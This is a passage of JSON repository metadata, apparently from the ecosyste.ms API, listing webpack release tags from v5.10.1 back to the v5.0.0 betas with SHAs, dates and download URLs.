d_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpa